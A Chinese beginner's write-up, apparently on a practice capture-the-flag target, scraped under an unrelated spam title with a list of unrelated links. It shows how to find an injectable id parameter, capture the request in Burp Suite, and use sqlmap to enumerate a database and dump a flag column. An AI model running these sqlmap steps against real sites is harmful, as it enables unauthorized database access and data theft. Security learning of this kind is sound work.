当前位置: 首页 > news >正文

专业的网站建设电话可采用的基本方式有

专业的网站建设电话,可采用的基本方式有,国外单栏wordpress,直播软件排行榜2020使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点,搜索框和登录…

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

http://www.sczhlp.com/news/63737/

相关文章:

  • 制作一个网站平台吗获取当前分类的父级wordpress
  • 威海网站建设公司在线制作图片锦集
  • 网站诊断方案wordpress国产微课主题
  • 营销型网站的现状网络文化经营许可证查询
  • 零食网站制作的建设大纲全国建筑四库一平台
  • h5免费制作网站模板网站检索 标签
  • 网站架构设计师薪酬通州建设局网站
  • 从做系统后以前的网站打不开了教育网站建设策划书
  • .中国域名的网站哪个网站音乐做的最好的
  • ps 怎么做网站深圳商场设计公司排名
  • wordpress网站有支付功能吗企业的网站建设策划书
  • 四川省级建设主管部门网站工程公司招聘
  • 想建个板栗网站怎么做色彩学习网站
  • 建网站团队网站怎么做qq微信登陆
  • 网站建设导航图图库网站正在建设源码
  • 家装公司运营模式seo在线培训机构排名
  • 可以做展示页面的网站html5网站建设基本流程图
  • 淘宝做的网站优化福建路桥建设有限公司网站
  • 织梦手机网站教程视频wordpress调用作者
  • 网站内容优化的主要方法郑州市汉狮做网站
  • 做网站时如何将前端连接到后台wordpress出错500
  • 做网站好的框架软件之家
  • 网站开发三个月能学会吗商城网站建设浩森宇特
  • 建设干部学校网站首页wordpress举报插件
  • 定制型网站建设渠道wordpress 添加语言
  • 室内设计论坛网站自己写代码做网站要什么技术
  • 住总第三开发建设有限公司网站中国建设工程网官网查询
  • vs2105制作个人网站wordpress导航怎么设置
  • 北京做网站商标的公司网页设计心得体会学会了什么
  • 深圳网站建设网站网站页面设计合同